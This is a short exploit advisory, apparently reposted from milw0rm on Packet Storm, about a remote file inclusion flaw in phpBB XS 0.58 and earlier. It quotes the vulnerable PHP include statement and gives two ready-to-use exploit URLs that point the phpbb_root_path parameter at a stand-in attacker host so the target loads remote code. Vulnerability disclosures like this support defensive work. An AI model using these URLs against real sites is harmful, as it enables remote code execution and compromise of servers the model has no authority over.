phpBB XS versions 0.58 and prior suffer from a remote file inclusion vulnerability.
cb6536e203f267f9d431732e0e902a8fb8e5df190b646e0ca52384ae52ae053d###########################################################
#phpBB XS <= 0.58 (phpbb_root_path) Remote File Include Vulnerability(2)
############################################################
#Author: XORON - SHiKaA
############################################################
#URL: https://www.comscripts.com/jump.php?action=script&id=1082
############################################################
#Class: Remote
############################################################
#Code: include($phpbb_root_path . 'language/lang_' .
$board_config['default_lang'] . '/lang_bbcb_mg.' . $phpEx);
############################################################
#Exploit:
https://www.site.com/[path]/includes/functions_kb.php?phpbb_root_path=https://evil_scripts?
https://www.site.com/[path]/includes/bbcb_mg.php?phpbb_root_path=https://evil_scripts?
############################################################
#Greetz: str0ke and AzzCoder ;)
############################################################
# milw0rm.com [2006-09-28]
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed